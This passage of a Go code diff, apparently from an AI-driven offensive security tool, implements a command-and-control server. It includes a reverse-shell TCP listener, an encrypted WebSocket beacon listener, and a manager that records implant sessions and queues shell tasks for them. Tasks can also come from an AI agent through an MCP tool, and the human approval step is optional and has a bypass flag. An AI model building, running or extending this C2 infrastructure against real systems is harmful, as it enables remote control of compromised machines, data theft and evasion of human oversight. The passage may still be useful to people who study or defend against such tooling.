if _, err := c.conn.Write([]byte(wrapped)); err != nil {
c.writeMu.Unlock()
l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "")
return
}
c.writeMu.Unlock()
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
output, err := readUntilMarker(ctx, c.reader, endMark)
if err != nil {
l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "")
return
}
cleaned := cleanShellOutput(output, cmd)
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
}
// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径
func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) {
_ = l.manager.IngestTaskResult(TaskResultReport{
TaskID: taskID,
Success: success,
Output: output,
Error: errMsg,
BlobBase64: blobB64,
BlobSuffix: blobSuffix,
StartedAt: startedAtMS,
EndedAt: NowUnixMillis(),
})
}
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些
// 需要二进制传输的能力建议使用 http_beacon。
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
switch t {
case TaskTypeExec, TaskTypeShell:
cmd, _ := payload["command"].(string)
return cmd, true
case TaskTypePwd:
return "pwd 2>/dev/null || cd", true
case TaskTypeLs:
path, _ := payload["path"].(string)
if strings.TrimSpace(path) == "" {
path = "."
}
return "ls -la " + shellQuote(path), true
case TaskTypePs:
return "ps -ef 2>/dev/null || ps aux", true
case TaskTypeKillProc:
pid, _ := payload["pid"].(float64)
if pid <= 0 {
return "", false
}
return fmt.Sprintf("kill -9 %d", int(pid)), true
case TaskTypeCd:
path, _ := payload["path"].(string)
if strings.TrimSpace(path) == "" {
return "", false
}
return "cd " + shellQuote(path) + " && pwd", true
case TaskTypeExit:
return "exit 0", true
}
return "", false
}
// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出
func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) {
var sb strings.Builder
buf := make([]byte, 4096)
deadline := time.Now().Add(60 * time.Second)
for {
select {
case <-ctx.Done():
return sb.String(), ctx.Err()
default:
}
if time.Now().After(deadline) {
return sb.String(), fmt.Errorf("timeout")
}
n, err := r.Read(buf)
if n > 0 {
sb.Write(buf[:n])
if idx := strings.Index(sb.String(), marker); idx >= 0 {
return strings.TrimRight(sb.String()[:idx], "\r\n"), nil
}
}
if err != nil {
return sb.String(), err
}
}
}
func shellQuote(s string) string {
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
}
func isAddrInUse(err error) bool {
if err == nil {
return false
}
return strings.Contains(strings.ToLower(err.Error()), "address already in use") ||
strings.Contains(strings.ToLower(err.Error()), "bind: only one usage")
}
func isClosedConnErr(err error) bool {
if err == nil {
return false
}
es := err.Error()
return strings.Contains(es, "use of closed network connection") ||
strings.Contains(es, "connection reset by peer")
}
// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据
func drainStaleData(r *bufio.Reader, conn net.Conn) {
buf := make([]byte, 4096)
for {
_ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond))
n, err := r.Read(buf)
if n == 0 || err != nil {
break
}
}
// 恢复较长的读超时
_ = conn.SetReadDeadline(time.Time{})
}
var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`)
// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出
func cleanShellOutput(raw, cmd string) string {
lines := strings.Split(raw, "\n")
var cleaned []string
cmdTrimmed := strings.TrimSpace(cmd)
echoSkipped := false
for _, line := range lines {
trimmed := strings.TrimRight(line, "\r \t")
// 跳过命令回显行(bash 会 echo 回输入的命令)
if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) {
echoSkipped = true
continue
}
// 跳过纯 shell 提示符行
if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 {
continue
}
cleaned = append(cleaned, line)
}
result := strings.Join(cleaned, "\n")
return strings.TrimSpace(result)
}
+297
View File
@@ -0,0 +1,297 @@
package c2
import (
"context"
"crypto/subtle"
"encoding/json"
"errors"
"fmt"
"net"
"net/http"
"sync"
"time"
"cyberstrike-ai/internal/database"
"github.com/gorilla/websocket"
"go.uber.org/zap"
)
// WebSocketListener 提供低延迟的双向 WebSocket Beacon。
// 与 HTTP Beacon 相比:
// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到";
// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出);
// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token
// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。
//
// 帧协议(皆为加密后 base64 字符串走 TextMessage):
// client → server{"type":"checkin"|"result", "data": <ImplantCheckInRequest|TaskResultReport>}
// server → client{"type":"task", "data": <TaskEnvelope>} 或 {"type":"sleep","data":{"sleep":N,"jitter":J}}
type WebSocketListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
srv *http.Server
upgrader websocket.Upgrader
mu sync.Mutex
conns map[string]*wsConn // session_id → 连接
stopped bool
stopCh chan struct{}
}
// wsConn 单个 WS implant 的内存状态
type wsConn struct {
sessionID string
ws *websocket.Conn
writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer
}
// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"]
func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) {
return &WebSocketListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
stopCh: make(chan struct{}),
conns: make(map[string]*wsConn),
upgrader: websocket.Upgrader{
ReadBufferSize: 4096,
WriteBufferSize: 4096,
// 允许任意 Originimplant 不带 Origin 或随便填)
CheckOrigin: func(r *http.Request) bool { return true },
},
}, nil
}
// Type 类型
func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) }
// Start 启动 HTTP server 接收 WS 升级
func (l *WebSocketListener) Start() error {
mux := http.NewServeMux()
wsPath := l.cfg.BeaconCheckInPath
if wsPath == "" || wsPath == "/check_in" {
// websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆
wsPath = "/ws"
}
mux.HandleFunc(wsPath, l.handleWS)
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
l.srv = &http.Server{
Addr: addr,
Handler: mux,
ReadHeaderTimeout: 15 * time.Second,
}
go func() {
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("websocket Serve exited", zap.Error(err))
}
}()
go l.taskDispatcherLoop()
return nil
}
// Stop 优雅关闭:通知所有 WS 客户端,关闭 server
func (l *WebSocketListener) Stop() error {
l.mu.Lock()
if l.stopped {
l.mu.Unlock()
return nil
}
l.stopped = true
close(l.stopCh)
conns := make([]*wsConn, 0, len(l.conns))
for _, c := range l.conns {
conns = append(conns, c)
}
l.conns = make(map[string]*wsConn)
l.mu.Unlock()
for _, c := range conns {
_ = c.ws.WriteControl(websocket.CloseMessage,
websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"),
time.Now().Add(time.Second))
_ = c.ws.Close()
}
if l.srv != nil {
ctx, cancel := contextWithTimeout(5 * time.Second)
defer cancel()
_ = l.srv.Shutdown(ctx)
}
return nil
}
func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) {
got := r.Header.Get("X-Implant-Token")
if got == "" || l.rec.ImplantToken == "" ||
subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 {
http.NotFound(w, r)
return
}
ws, err := l.upgrader.Upgrade(w, r, nil)
if err != nil {
l.logger.Warn("websocket 升级失败", zap.Error(err))
return
}
go l.handleConn(ws)
}
// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环
func (l *WebSocketListener) handleConn(ws *websocket.Conn) {
ws.SetReadLimit(64 << 20)
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
ws.SetPongHandler(func(string) error {
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
return nil
})
// 第一帧必须是 checkin
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
if err != nil || frameType != "checkin" {
_ = ws.Close()
return
}
var req ImplantCheckInRequest
if err := json.Unmarshal(body, &req); err != nil {
_ = ws.Close()
return
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
_ = ws.Close()
return
}
conn := &wsConn{sessionID: session.ID, ws: ws}
l.mu.Lock()
l.conns[session.ID] = conn
l.mu.Unlock()
defer func() {
l.mu.Lock()
delete(l.conns, session.ID)
l.mu.Unlock()
_ = ws.Close()
_ = l.manager.MarkSessionDead(session.ID)
}()
// 心跳 goroutine
pingTicker := time.NewTicker(20 * time.Second)
defer pingTicker.Stop()
go func() {
for {
select {
case <-l.stopCh:
return
case <-pingTicker.C:
conn.writeMu.Lock()
_ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second))
conn.writeMu.Unlock()
}
}
}()
// 主读循环:处理 result 等帧
for {
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
if err != nil {
return
}
switch frameType {
case "result":
var report TaskResultReport
if err := json.Unmarshal(body, &report); err == nil {
_ = l.manager.IngestTaskResult(report)
}
case "checkin":
// 心跳更新:beacon 周期性送上心跳
var hb ImplantCheckInRequest
if err := json.Unmarshal(body, &hb); err == nil {
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
}
}
}
}
// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务
func (l *WebSocketListener) taskDispatcherLoop() {
t := time.NewTicker(500 * time.Millisecond)
defer t.Stop()
for {
select {
case <-l.stopCh:
return
case <-t.C:
l.mu.Lock()
snapshot := make([]*wsConn, 0, len(l.conns))
for _, c := range l.conns {
snapshot = append(snapshot, c)
}
l.mu.Unlock()
for _, c := range snapshot {
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20)
if err != nil || len(envelopes) == 0 {
continue
}
for _, env := range envelopes {
l.sendTaskFrame(c, env)
}
}
}
}
}
func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) {
frame := map[string]interface{}{"type": "task", "data": env}
body, err := json.Marshal(frame)
if err != nil {
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
return
}
c.writeMu.Lock()
defer c.writeMu.Unlock()
_ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second))
_ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc))
}
// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data
func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) {
mt, raw, err := ws.ReadMessage()
if err != nil {
return "", nil, err
}
if mt != websocket.TextMessage && mt != websocket.BinaryMessage {
return "", nil, errors.New("unexpected ws frame type")
}
plain, err := DecryptAESGCM(key, string(raw))
if err != nil {
return "", nil, err
}
var env struct {
Type string `json:"type"`
Data json.RawMessage `json:"data"`
}
if err := json.Unmarshal(plain, &env); err != nil {
return "", nil, err
}
return env.Type, env.Data, nil
}
// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context
func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) {
return context.WithTimeout(context.Background(), d)
}
+779
View File
@@ -0,0 +1,779 @@
package c2
import (
"context"
"encoding/json"
"errors"
"fmt"
"path/filepath"
"regexp"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"github.com/google/uuid"
"go.uber.org/zap"
)
// Manager 是 C2 模块对外的统一门面:
// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2
// 不直接接触 listener 实现细节,避免循环依赖;
// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map
// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。
//
// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp.
type Manager struct {
db *database.DB
logger *zap.Logger
bus *EventBus
registry *ListenerRegistry
mu sync.RWMutex
runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例
storageDir string // 大结果(截图/下载)落盘根目录
hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL)
hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥
hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链
}
// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。
const MCPToolC2Task = "c2_task"
// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。
// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。
type HITLBridge interface {
// RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。
// ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。
RequestApproval(ctx context.Context, req HITLApprovalRequest) error
}
// HITLApprovalRequest 待审批的 C2 操作描述
type HITLApprovalRequest struct {
TaskID string
SessionID string
TaskType string
PayloadJSON string
ConversationID string
Source string
Reason string
}
// Hooks 给上层(漏洞管理 / 攻击链)注入回调
type Hooks struct {
OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线
OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed
}
// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners
func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager {
if logger == nil {
logger = zap.NewNop()
}
if storageDir == "" {
storageDir = "tmp/c2"
}
return &Manager{
db: db,
logger: logger,
bus: NewEventBus(),
registry: NewListenerRegistry(),
runningListeners: make(map[string]Listener),
storageDir: storageDir,
}
}
// SetHITLBridge 设置危险任务审批桥;nil 表示禁用
func (m *Manager) SetHITLBridge(b HITLBridge) {
m.mu.Lock()
m.hitlBridge = b
m.mu.Unlock()
}
// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。
// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。
func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) {
m.mu.Lock()
m.hitlDangerousGate = gate
m.mu.Unlock()
}
// SetHooks 注入业务钩子
func (m *Manager) SetHooks(h Hooks) {
m.mu.Lock()
m.hooks = h
m.mu.Unlock()
}
// EventBus 暴露事件总线给 SSE handler
func (m *Manager) EventBus() *EventBus { return m.bus }
// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装)
func (m *Manager) DB() *database.DB { return m.db }
// Logger 暴露日志句柄
func (m *Manager) Logger() *zap.Logger { return m.logger }
// StorageDir 大结果落盘根目录
func (m *Manager) StorageDir() string { return m.storageDir }
// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现
func (m *Manager) Registry() *ListenerRegistry { return m.registry }
// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线
func (m *Manager) Close() {
m.mu.Lock()
listeners := make([]Listener, 0, len(m.runningListeners))
for _, l := range m.runningListeners {
listeners = append(listeners, l)
}
m.runningListeners = make(map[string]Listener)
m.mu.Unlock()
for _, l := range listeners {
_ = l.Stop()
}
m.bus.Close()
}
// ----------------------------------------------------------------------------
// Listener 生命周期
// ----------------------------------------------------------------------------
// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim)
type CreateListenerInput struct {
Name string
Type string
BindHost string
BindPort int
ProfileID string
Remark string
Config *ListenerConfig
// CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind
CallbackHost string
}
// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动)
func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) {
if strings.TrimSpace(in.Name) == "" {
return nil, ErrInvalidInput
}
if !IsValidListenerType(in.Type) {
return nil, ErrUnsupportedType
}
if err := SafeBindPort(in.BindPort); err != nil {
return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400}
}
bindHost := strings.TrimSpace(in.BindHost)
if bindHost == "" {
bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改
}
cfg := in.Config
if cfg == nil {
cfg = &ListenerConfig{}
} else {
cp := *cfg
cfg = &cp
}
if ch := strings.TrimSpace(in.CallbackHost); ch != "" {
cfg.CallbackHost = ch
}
cfg.ApplyDefaults()
cfgJSON, err := json.Marshal(cfg)
if err != nil {
return nil, fmt.Errorf("marshal listener config: %w", err)
}
keyB64, err := GenerateAESKey()
if err != nil {
return nil, fmt.Errorf("generate key: %w", err)
}
tokenB64, err := GenerateImplantToken()
if err != nil {
return nil, fmt.Errorf("generate token: %w", err)
}
listener := &database.C2Listener{
ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
Name: strings.TrimSpace(in.Name),
Type: strings.ToLower(strings.TrimSpace(in.Type)),
BindHost: bindHost,
BindPort: in.BindPort,
ProfileID: strings.TrimSpace(in.ProfileID),
EncryptionKey: keyB64,
ImplantToken: tokenB64,
Status: "stopped",
ConfigJSON: string(cfgJSON),
Remark: strings.TrimSpace(in.Remark),
CreatedAt: time.Now(),
}
if err := m.db.CreateC2Listener(listener); err != nil {
return nil, err
}
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{
"listener_id": listener.ID,
"type": listener.Type,
})
return listener, nil
}
// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning
func (m *Manager) StartListener(id string) (*database.C2Listener, error) {
rec, err := m.db.GetC2Listener(id)
if err != nil {
return nil, err
}
if rec == nil {
return nil, ErrListenerNotFound
}
m.mu.Lock()
if _, ok := m.runningListeners[id]; ok {
m.mu.Unlock()
return rec, ErrListenerRunning
}
m.mu.Unlock()
cfg := &ListenerConfig{}
if rec.ConfigJSON != "" {
_ = json.Unmarshal([]byte(rec.ConfigJSON), cfg)
}
cfg.ApplyDefaults()
// 通过工厂创建具体实现。必须使用 rec 的副本:HTTP handler 在返回 JSON 前会清空
// rec.ImplantToken / EncryptionKey 做脱敏,若 listener 实现持有同一指针会导致 beacon 鉴权永久失败。
listenerRec := *rec
factory := m.registry.Get(rec.Type)
if factory == nil {
return nil, ErrUnsupportedType
}
inst, err := factory(ListenerCreationCtx{
Listener: &listenerRec,
Config: cfg,
Manager: m,
Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)),
})
if err != nil {
return nil, err
}
if err := inst.Start(); err != nil {
now := time.Now()
_ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now)
m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{
"listener_id": rec.ID,
})
return nil, err
}
m.mu.Lock()
m.runningListeners[rec.ID] = inst
m.mu.Unlock()
now := time.Now()
_ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now)
rec.Status = "running"
rec.StartedAt = &now
rec.LastError = ""
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{
"listener_id": rec.ID,
"bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort),
})
return rec, nil
}
// StopListener 停止;幂等(未运行时返回 ErrListenerStopped
func (m *Manager) StopListener(id string) error {
m.mu.Lock()
inst, ok := m.runningListeners[id]
if ok {
delete(m.runningListeners, id)
}
m.mu.Unlock()
if !ok {
return ErrListenerStopped
}
if err := inst.Stop(); err != nil {
return err
}
_ = m.db.SetC2ListenerStatus(id, "stopped", "", nil)
rec, _ := m.db.GetC2Listener(id)
name := id
if rec != nil {
name = rec.Name
}
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{
"listener_id": id,
})
return nil
}
// DeleteListener 停止并删除(级联 sessions/tasks/files
func (m *Manager) DeleteListener(id string) error {
_ = m.StopListener(id)
return m.db.DeleteC2Listener(id)
}
// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时)
func (m *Manager) IsListenerRunning(id string) bool {
m.mu.RLock()
defer m.mu.RUnlock()
_, ok := m.runningListeners[id]
return ok
}
// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起;
// 失败的会被改为 status=error,不会阻塞整个 App 启动。
func (m *Manager) RestoreRunningListeners() {
listeners, err := m.db.ListC2Listeners()
if err != nil {
m.logger.Warn("恢复 C2 listener 失败:列表查询出错", zap.Error(err))
return
}
for _, l := range listeners {
if l.Status != "running" {
continue
}
if _, err := m.StartListener(l.ID); err != nil && !errors.Is(err, ErrListenerRunning) {
m.logger.Warn("恢复 C2 listener 失败", zap.String("listener_id", l.ID), zap.Error(err))
}
}
}
// ----------------------------------------------------------------------------
// Session 生命周期
// ----------------------------------------------------------------------------
// IngestCheckIn beacon 上线/心跳的统一入口。
// 行为:
// 1. 若 implant_uuid 已有会话 → 更新心跳/状态
// 2. 否则创建新会话,触发 OnSessionFirstSeen 钩子
func (m *Manager) IngestCheckIn(listenerID string, req ImplantCheckInRequest) (*database.C2Session, error) {
if strings.TrimSpace(req.ImplantUUID) == "" {
return nil, ErrInvalidInput
}
existing, err := m.db.GetC2SessionByImplantUUID(req.ImplantUUID)
if err != nil {
return nil, err
}
now := time.Now()
isFirstSeen := existing == nil
var sessID string
if existing != nil {
sessID = existing.ID
} else {
sessID = "s_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
}
session := &database.C2Session{
ID: sessID,
ListenerID: listenerID,
ImplantUUID: req.ImplantUUID,
Hostname: req.Hostname,
Username: req.Username,
OS: strings.ToLower(req.OS),
Arch: strings.ToLower(req.Arch),
PID: req.PID,
ProcessName: req.ProcessName,
IsAdmin: req.IsAdmin,
InternalIP: req.InternalIP,
UserAgent: req.UserAgent,
SleepSeconds: req.SleepSeconds,
JitterPercent: req.JitterPercent,
Status: string(SessionActive),
FirstSeenAt: now,
LastCheckIn: now,
Metadata: req.Metadata,
}
if existing != nil {
// 保留原 ID/FirstSeenAt/Note,避免被覆盖
session.FirstSeenAt = existing.FirstSeenAt
if session.Note == "" {
session.Note = existing.Note
}
}
if err := m.db.UpsertC2Session(session); err != nil {
return nil, err
}
if isFirstSeen {
m.publishEvent("critical", "session", session.ID, "",
fmt.Sprintf("新会话上线: %s@%s (%s/%s)", session.Username, session.Hostname, session.OS, session.Arch),
map[string]interface{}{
"session_id": session.ID,
"listener_id": listenerID,
"hostname": session.Hostname,
"os": session.OS,
"arch": session.Arch,
"internal_ip": session.InternalIP,
})
m.mu.RLock()
hook := m.hooks.OnSessionFirstSeen
m.mu.RUnlock()
if hook != nil {
go hook(session)
}
}
// 普通心跳:last_check_in 已由 UpsertC2Session 写入 c2_sessions,不再落 c2_events。
// 否则按 sleep 周期每条心跳一条审计,库表与 SSE 会被迅速撑爆;上线/掉线等仍照常 publishEvent。
return session, nil
}
// MarkSessionDead 心跳超时检测器调用:标记会话为 dead
func (m *Manager) MarkSessionDead(sessionID string) error {
if err := m.db.SetC2SessionStatus(sessionID, string(SessionDead)); err != nil {
return err
}
m.publishEvent("warn", "session", sessionID, "", "会话已离线(心跳超时)", nil)
return nil
}
// ----------------------------------------------------------------------------
// Task 生命周期
// ----------------------------------------------------------------------------
// EnqueueTaskInput 下发任务入参
type EnqueueTaskInput struct {
SessionID string
TaskType TaskType
Payload map[string]interface{}
Source string // manual|ai|batch|api
ConversationID string
UserCtx context.Context // 给 HITL 用
BypassHITL bool // true 表示跳过 HITL 审批(仅供白名单机制 / 系统内部用)
}
// EnqueueTask 入队一个新任务;若任务类型危险且未 BypassHITL,且 SetHITLDangerousGate 对当前会话与 MCPToolC2Task 返回 true,才会调 HITL 桥审批。
// 返回任务记录;任务派发由 PopTasksForBeacon 在 beacon 拉任务时完成。
func (m *Manager) EnqueueTask(in EnqueueTaskInput) (*database.C2Task, error) {
if strings.TrimSpace(in.SessionID) == "" {
return nil, ErrInvalidInput
}
session, err := m.db.GetC2Session(in.SessionID)
if err != nil {
return nil, err
}
if session == nil {
return nil, ErrSessionNotFound
}
if session.Status == string(SessionDead) || session.Status == string(SessionKilled) {
return nil, &CommonError{Code: "session_inactive", Message: "会话已离线,无法下发任务", HTTP: 409}
}
// OPSEC: command deny regex enforcement
if in.TaskType == TaskTypeExec || in.TaskType == TaskTypeShell {
cmd, _ := in.Payload["command"].(string)
if cmd != "" {
listenerCfg := m.getListenerConfig(session.ListenerID)
if listenerCfg != nil {
for _, pattern := range listenerCfg.CommandDenyRegex {
re, err := regexp.Compile(pattern)
if err != nil {
m.logger.Warn("invalid command_deny_regex", zap.String("pattern", pattern), zap.Error(err))
continue
}
if re.MatchString(cmd) {
return nil, &CommonError{
Code: "command_denied",
Message: fmt.Sprintf("命令被 OPSEC 规则拒绝 (匹配: %s)", pattern),
HTTP: 403,
}
}
}
}
}
}
// OPSEC: max_concurrent_tasks enforcement
listenerCfg := m.getListenerConfig(session.ListenerID)
if listenerCfg != nil && listenerCfg.MaxConcurrentTasks > 0 {
activeTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
SessionID: in.SessionID,
Status: string(TaskQueued),
})
sentTasks, _ := m.db.ListC2Tasks(database.ListC2TasksFilter{
SessionID: in.SessionID,
Status: string(TaskSent),
})
concurrent := len(activeTasks) + len(sentTasks)
if concurrent >= listenerCfg.MaxConcurrentTasks {
return nil, &CommonError{
Code: "concurrent_limit",
Message: fmt.Sprintf("会话已有 %d 个排队/执行中的任务,超过并发上限 %d", concurrent, listenerCfg.MaxConcurrentTasks),
HTTP: 429,
}
}
}
taskID := "t_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
task := &database.C2Task{
ID: taskID,
SessionID: in.SessionID,
TaskType: string(in.TaskType),
Payload: in.Payload,
Status: string(TaskQueued),
Source: strOr(in.Source, "manual"),
ConversationID: in.ConversationID,
CreatedAt: time.Now(),
}
// HITL 检查:仅当注入的 gate 认为当前会话应对统一 MCP 工具 c2_task 做人机协同时才走桥(关闭人机协同时与其它工具一致,直接入队)。
if IsDangerousTaskType(in.TaskType) && !in.BypassHITL {
m.mu.RLock()
bridge := m.hitlBridge
gate := m.hitlDangerousGate
m.mu.RUnlock()
convID := strings.TrimSpace(in.ConversationID)
useBridge := bridge != nil && gate != nil && gate(convID, MCPToolC2Task)
if useBridge {
task.ApprovalStatus = "pending"
if err := m.db.CreateC2Task(task); err != nil {
return nil, err
}
m.publishEvent("warn", "task", in.SessionID, taskID, fmt.Sprintf("危险任务待审批: %s", in.TaskType), map[string]interface{}{
"task_id": taskID,
"task_type": in.TaskType,
})
payloadBytes, _ := json.Marshal(in.Payload)
ctx := HITLUserContext(in.UserCtx)
if ctx == nil {
ctx = context.Background()
}
go func() {
err := bridge.RequestApproval(ctx, HITLApprovalRequest{
TaskID: taskID,
SessionID: in.SessionID,
TaskType: string(in.TaskType),
PayloadJSON: string(payloadBytes),
ConversationID: in.ConversationID,
Source: task.Source,
Reason: fmt.Sprintf("C2 危险任务 %s", in.TaskType),
})
if err != nil {
rejected := "rejected"
failed := string(TaskFailed)
errMsg := "HITL 拒绝: " + err.Error()
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{
ApprovalStatus: &rejected,
Status: &failed,
Error: &errMsg,
})
m.publishEvent("warn", "task", in.SessionID, taskID, errMsg, nil)
return
}
approved := "approved"
_ = m.db.UpdateC2Task(taskID, database.C2TaskUpdate{ApprovalStatus: &approved})
m.publishEvent("info", "task", in.SessionID, taskID, "危险任务已批准", nil)
}()
return task, nil
}
// 未接桥或会话未开启人机协同 / 工具在白名单:直接入队
task.ApprovalStatus = "approved"
}
if err := m.db.CreateC2Task(task); err != nil {
return nil, err
}
m.publishEvent("info", "task", in.SessionID, taskID, fmt.Sprintf("任务已入队: %s", in.TaskType), map[string]interface{}{
"task_id": taskID,
"task_type": in.TaskType,
"source": task.Source,
})
return task, nil
}
// CancelTask 取消队列中的任务(已 sent/running 的暂不支持回滚)
func (m *Manager) CancelTask(taskID string) error {
t, err := m.db.GetC2Task(taskID)
if err != nil {
return err
}
if t == nil {
return ErrTaskNotFound
}
if t.Status != string(TaskQueued) && t.Status != string(TaskSent) {
return &CommonError{Code: "task_running", Message: "任务已在执行,无法取消", HTTP: 409}
}
cancelled := string(TaskCancelled)
now := time.Now()
if err := m.db.UpdateC2Task(taskID, database.C2TaskUpdate{Status: &cancelled, CompletedAt: &now}); err != nil {
return err
}
m.publishEvent("info", "task", t.SessionID, taskID, "任务已取消", nil)
return nil
}
// PopTasksForBeacon beacon check_in 后调用:取该会话所有 queued+approved 的任务,
// 内部已置为 sent;返回 TaskEnvelope,便于 listener 直接编码下发。
func (m *Manager) PopTasksForBeacon(sessionID string, limit int) ([]TaskEnvelope, error) {
tasks, err := m.db.PopQueuedC2Tasks(sessionID, limit)
if err != nil {
return nil, err
}
out := make([]TaskEnvelope, 0, len(tasks))
for _, t := range tasks {
out = append(out, TaskEnvelope{TaskID: t.ID, TaskType: t.TaskType, Payload: t.Payload})
}
return out, nil
}
// IngestTaskResult beacon 回传任务结果的统一入口
func (m *Manager) IngestTaskResult(report TaskResultReport) error {
